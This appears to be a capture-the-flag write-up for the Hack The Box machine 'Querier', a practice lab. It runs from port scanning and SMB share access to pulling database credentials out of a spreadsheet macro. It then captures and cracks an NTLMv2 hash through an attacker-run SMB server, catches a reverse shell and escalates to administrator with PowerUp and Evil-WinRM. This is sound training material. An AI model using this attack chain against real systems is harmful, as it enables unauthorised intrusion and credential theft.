As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Mon Apr 3 19:49:39 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.125
Nmap scan report for 10.10.10.125
Host is up (0.040s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
# Nmap done at Mon Apr 3 19:49:53 2023 -- 1 IP address (1 host up) scanned in 14.05 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Apr 3 19:50:25 2023 as: nmap -sCV -p135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671 -Pn -n -oN targeted 10.10.10.125
Nmap scan report for 10.10.10.125
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-04-03T17:47:51
|_Not valid after: 2053-04-03T17:47:51
|_ssl-date: 2023-04-03T17:51:29+00:00; 0s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-03T17:51:25
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 3 19:51:29 2023 -- 1 IP address (1 host up) scanned in 63.93 seconds
Let's start by enumerating the SMB service. As we can see there is one share called Reports in which we have read privileges.
smbmap -H 10.10.10.125 -u 'guest'
[+] IP: 10.10.10.125:445 Name: HTB.LOCAL
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Reports READ ONLY
Let's connect to it.
smbclient //10.10.10.125/Reports -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jan 29 00:23:48 2019
.. D 0 Tue Jan 29 00:23:48 2019
Currency Volume Report.xlsm A 12229 Sun Jan 27 23:21:34 2019
5158399 blocks of size 4096. 836579 blocks available
There is one file called Currency Volume Report.xlsm. Download it to our local machine.
smb: > get "Currency Volume Report.xlsm"
Exploitation
If we try to open it with libreoffice, we'll see a popup message saying that the file has macros.
libreoffice Currency\ Volume\ Report.xlsm
If we check the macros of the file, we'll see that it is trying to make a connection to a MSSQL database with some credentials.
olevba Currency\ Volume\ Report.xlsm
olevba 0.60.1 on Python 3.11.1 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' macro to pull data for client volume reports
'
' further testing required
Private Sub Connect()
Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
If conn.State = adStateOpen Then
' MsgBox "connection successful"
'Set rs = conn.Execute("SELECT * @@version;")
Set rs = conn.Execute("SELECT * FROM volume;")
Sheets(1).Range("A1").CopyFromRecordset rs
rs.Close
End If
End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open |May open a file |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
When we have access to a MSSQL database, the idea is to be able to run the xp_cmdshell command to run commands on the system. The problem is that we don't have the privileges to enable it with our current user.
xp_cmdshell whoami
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
For now, we can't use this utility. We could try to load a non-existent file from our SMB server with a command from the MSSQL server, so when it authenticates in our SMB server, we'll get the server's NTLMv2 hash. Set up a simple SMB server on our local system.
impacket-smbserver smbFolder $(pwd) -smb2support
Now, connect to the SMB server from the MSSQL server, and we'll get the NTLMv2 hash of the mssql-svc user.
Copy and paste the hash into the hash file, and break it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568 (mssql-svc)
1g 0:00:00:03 DONE (2023-04-04 10:02) 0.2932g/s 2627Kp/s 2627Kc/s 2627KC/s correforenz..cornamuckla
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Listening on 0.0.0.0 4444
Connection received on 10.10.10.125 49700
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
querier\mssql-svc
C:\Windows\system32>type \users\mssql-svc\desktop\user.txt
type \users\mssql-svc\desktop\user.txt
2b3515a3eb580340939320ea2f176c6c
Privilege Escalation
Let's create a directory called privEsc in C:\Windows\Temp and go there.
cd \windows\temp
mkdir privEsc
cd privEsc
Now, let's upload the PowerUp.ps1 script to the system to enumerate it and see if there is a way to escalate privileges. Set the SMB server where the PowerShell script is located.
The script found a password for the administrator user. As we now have credentials, we can get a shell as the administrator. Then, all we have to do is reap the harvest and take the root flag.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
querier\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
cedef5487249d8c77383bc41c3416522
